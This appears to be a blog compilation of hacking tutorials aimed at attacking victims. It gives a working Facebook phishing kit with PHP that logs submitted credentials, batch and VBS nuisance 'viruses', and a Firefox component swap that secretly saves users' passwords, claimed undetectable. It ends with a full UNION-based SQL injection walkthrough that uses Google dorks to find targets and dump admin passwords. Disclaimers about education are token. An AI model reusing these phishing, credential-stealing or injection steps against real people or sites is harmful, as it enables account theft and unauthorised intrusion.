Phishing Facebook Tutorial

This tutorial will tell u abt how to make a fake login page and tap your victim by Phishing just as the way fish falls to the trap

1.) First part:Creating the Fake Login Page.

In this part of the tutorial I’m going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Facebook as an example.

Part 1:

First we create a PHP script that will save the passwords in a text file.

Part 1:

First we create a PHP script that will save the passwords in a text file.

1.) Open notepad and put this code:

header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>

2.)Now save this as phishing.php

Note:

header (‘Location: https://login.facebook.com/login.php ’);

This URL is where the victim is redirected after logging in to you fake page.
The best way to do this is to go to the original site(in this case facebook) and try to login without username and password. Of course then the site will tell you that the username/password incorrect.Now copy that url and paste in that part of the phish.php script. As you can see the Facebook has got “https://login.facebook.com/login.php“

Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password’s.

Part 2:

Now we go to http://www.facebook.com and right click / View Source.
Now we need to find the place where LOGIN button in facebook page send the user after clicking on it.
To do that we search for something like:

CODE

action=anything.

In this case we have:

action=”https://login.facebook.com/login.php?”

We replace that part with:

action=”phishing.php”

Then we copy the whole source and save this file as login.php.

Now upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go. Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.

The phishing link should be something like this:

http://somewebhosting.com/login. php —> Send this to your victim

And the txt file with the passwords like this:

http://somewebhosting.com/passwords.txt —> View the passwords with this one.

Still having trouble with phishing??? i can make it much easier for u, Ma friend frm Cyber Terrorist Team have made a software for people like u, to make it simple… Just Download the Application frm here, these will generate all the necessary phishing.php and login.php for u, You just need to upload it in some web host and send the link to Your friends to hack passwords…

DOWNLOAD SUPER FISHING

How to Use it:

1. Enter the URL of the login page( any social network site) in the first text box…

2. Name of the log file : were the passwords of victim is stored, name it as u want ie. anyname.txt

3. Name of login page, mostly login.php

4. Redirection : enter the login page of the website, u wnat to phish, for ex: www.facebook.com is u wanna phish, You should make https://login.facebook.com/login.php this link there…

5. finally click Build Phisher, it will generate output…

Create Viruses

How to create a new folder virus
1)Open a notepad
2)write the code given below
3)
:hackfact
md "New Folder"
cd "New Folder"
goto hackfact
4)Now go to file and click on save as
5)Give anyname with extention as .bat for eg:- virus.bat
6)Now go and click on it.......bingoo...:)

Understand:- Now see what we have actually done here
md=make directory(which orders to create a folder with a name "new folder"
cd=change directory(which after creation of new directory goes into that directory.
now goto hackfact simply makes a loop so that command will run again and again.
download already made New Folder virus
A Virus That Will Open And Close Ur Cdrom
Copy the code below into notepad and save it as anyname.vbs like virus.vbs and then double click on it...what u see....bingo (for saving it click on file then Save as virus.vbs)

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


Now if u want to disable this go to task manager click on process then find wscript.exe and end this process
download "A Virus That Will Open And Close Ur Cdrom" you just need to click and run

How to hide files and important computer data

Hiding data / file Method no. 1
Properties method of windows
Step 1: Right click on the folder which you want to hide.
Step 2: Go to properties and click on hidden attribute and press ok...
Step 3: Now go to my computer and press ALT+T.
Step 4: Now click on folder options and go to view tab.
Step 5: Their you will see option don't show hidden files and folders click on that and then press ok...bingooo..:)
Note:- to see that hidden folder again just click on show hidden files and folders on view tab, and in properties just unselect the hidden attribute.



Hiding data / file Method no. 2
Hiding data using command prompt
Step 1: Copy all your data in a folder now put that data in c drive and name it as say hidedata.
Step 2: Now go to start menu and in the text area type cmd and press enter
Step 3: Now a black screen like this will open up.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\xxx>
Step 4: Type cd\ here like this and hit enter.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\xxx>cd \

Step 5: Now type the given below command in command prompt
attrib +s +h hidedata
step 6: Just follow from the step 3 of method 1....bingoo...:)

Note:-To make that folder visible either follow the steps of method 1 or type attrib -s -h hidedata in command prompt...




Hiding data / file Method no. 3
alt+0160 waala
Step 1: Right click on the folder which you want to hide.
Step 2 : Click on rename
Step 3 : Now press alt+0160(from numpad-keys on the right side) and then hit enter...bingoooo...:)
How to Hide text behind images-(Stegonography)
Step 1: Copy an image file to c: of your computer.
Step 2: Copy the text(which you want to hide) to clipboard, by writing it in notepad and selecting it, right clicking it, then copy.
Step 3: Open cmd, by going to Start — All Programs — Accessories — Command Prompt.
Step 4: In cmd type :
cd \
echo “your text to hide” >> “image.jpg”.
Step 5: Now right click on image.jpg — Open with — Notepad. You can see your hidden text at the end of your image file contents.

Usin this method you can sent personell message or private things to others, make your personell diary which no one can read or do whatever you like..:)

Send Fake Email

Dear User,

Please do not use this to harm anyone's resources or steal any confidential information.
If you do that we will not be held responsible for that.

Regards,
http://rohitmewada.blogspot.com/
send fake email

Different ways of password cracking

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even ‘well-chosen’ passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user’s personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word “password”, “passcode”, “admin” and their derivatives
* the user’s name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet’s name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard — qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on….

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Check Your Password Strength

3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications’ (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on “enter” or “login” login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Trick on How to Convert Firefox into keylogger

Do you want create your own working undectable keylogger and without any programming knowledge.The keylogger can store all the usernames and passwords of mozilla firefox without the user’s consent.

How this Keylogger Works?

Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website.

We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.

Can this be detected by antivirus?

I have scanned it with Mcafee,Norton and Avast and it is totally undetectable.

Does It work on all websites?

It is working on almost all websites like facebook,hotmail,reddit and digg.But this trick somehow failed on Gmail.

Now I will give you the step by step tutorial on how to use this trick

1. Download this script here
2. Now go to the following address

If you are Windows user then goto

C:/Program Files/Mozilla Firefox/Components

If you are MAC user then goto

Applications > Right click Firefox > Show Package Contents >Contents/MacOS/Components

1. Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we will be replacing this file in next step.
2. Extract the script folder that you have downloaded in first step and copy and paste the nsLoginManagerPrompter.js from the folder to the folder mentioned in step 2.
3. So now your firefox keylogger is ready.Now Each and every username and password will be automatically saved.

The next step is to retrieve the username and passwords that have been stored in your firefox browser.

It is very easy to retrieve the password from firefox using firepasswordviewer.

Trick to Decrypt Passwords Stored in Firefox With FirePasswordViewer

We usually store the username and passwords of the websites that we access regularly into Firefox to skip the need of entering the username and password over and again.Firefox stores the username and password for websites by user’s permission.These username and passwords are stored in an encrypted manner into Firefox sign-on database.

But this can be very harmful to you if somebody access your computer as these passwords can be decrypted easily.So,your accounts may get hacked.I will also show you the method to protect yourself from getting hacked .This trick works on all operating systems like windows xp,vista and windows 7.It also supports all Firefox browser versions.

Here is a step by step tutorial with screenshots on Trick to Decrypt Passwords Stored in Firefox With FirePasswordViewer

1. Download FirePasswordViewer.This is freeware utility and is also available in portable version.
2. After downloading run the portable version of the software.
3. It will automatically find the path of your Firefox user profile.
4. Now click on Start Recovery button.It will list all the stored website with username and password.

5. The passwords are hidden.To unhide them Click on the Show Password button

6. You can also store the results in HTML format by clicking on the button Save as HTML

Now if you want to protect yourself from such a hack I have a solution for you.To stop tools such as FirePasswordViewer accessing and decrypting your secret information you can set a master password in firefox.To set a master password goto Tools >> Options >> Security and now check the Master password checkbox.Enter your password and now your information is secure.

Note:The aim of this tutorial is to help you recover your passwords stored in your firefox browser  and to protect you from getting hacked.

How to Download Books from Google Book Store

Downloading a book for free from internet is little bit a tedious task. Whenever you try download a book it asks you to purchase that book from like Amazon.com. Amazon has a biggest book store where you can find any book that exists in the world but to have that book you have to purchase that you cannot download the book for free from there. But Google Book Store gives you a option to read the book online so you don’t have to purchase that book. But to read a book you have to be online all the time which can be very difficult for you. So here are the simple steps that you have to follow to download a book from Google Book Store. This trick only works in Mozilla Firefox.

How to Download Books from Google Book Store:-

• First of all install Greasemonkey  Add-On to your Firefox browser.
• Click on Add to Firefox and then on install Now button.

• Now Restart your Firefox and you will see a monkey icon adjacent to your Address bar.
• After installing this you have to install a user script Google Book Downloader.
• For this click on the install button and again on install button.

• Now you will see a message displaying Google Book Downloader installed successfully at the right bottom of your screen.

• Now go to the Google book store and find your book there.
• Here you will see a button saying Download this Book in the left panel.

• That’s it. Now you will be able read your desired book offline.

Note:- If you are not able to download book on clicking Download this Book button then install FlashGot Add-on in your browser. After installing the addon right click on the Download this Book button and select FlashGot Link option and then click start download button.

10 Google tricks – Google Hacking

Google Tricks – Google Hacking

1.      Google trick to  search different file formats (keyword filetype:doc)

2.      Google trick to search educational resources (keyword site:.edu) example (computer site:.edu)

3.      Finding the time of any location (time romania)

4.      Finding the weather of any location (boston weather)

5.      Tracking commentary of live events (Olympic games Beijing 2008)

6.      Using Google as a calculator (9 * 10)(143+234)(119-8)

7.      Converting currencies (1 USD in INR)(10 US Dollars in Indian Rupee)

8.      Find how many teaspoons are in a quarter cup (quarter cup in teaspoons)

9.      How many seconds there are in a year (seconds in a year)

10.    Tracking stocks (stocks:MSFT)

11.    Finding faces (add imgtype=face to the URL)

SQL Injection

What  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more. 



Some List of Database are:

* DB servers,
* MySQL(Open source), 
* MSSQL, 
* MS-ACCESS, 
* Oracle, 
* Postgre SQL(open source), 
* SQLite,



SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:
Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=

 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'

 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable. 

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table. 
For that replace the single quotes(') with "order by n" statement.(leave one space between number andorder by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
 

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns). 

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

 Now it will show the list of table names. Find the table name which is related with the admin or user. 




Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:

http://www.victimsite.com/index.php?id=-2 
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password. 
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs. 

Step 8: Finding the Admin Panel:
Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html

Note:
This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing.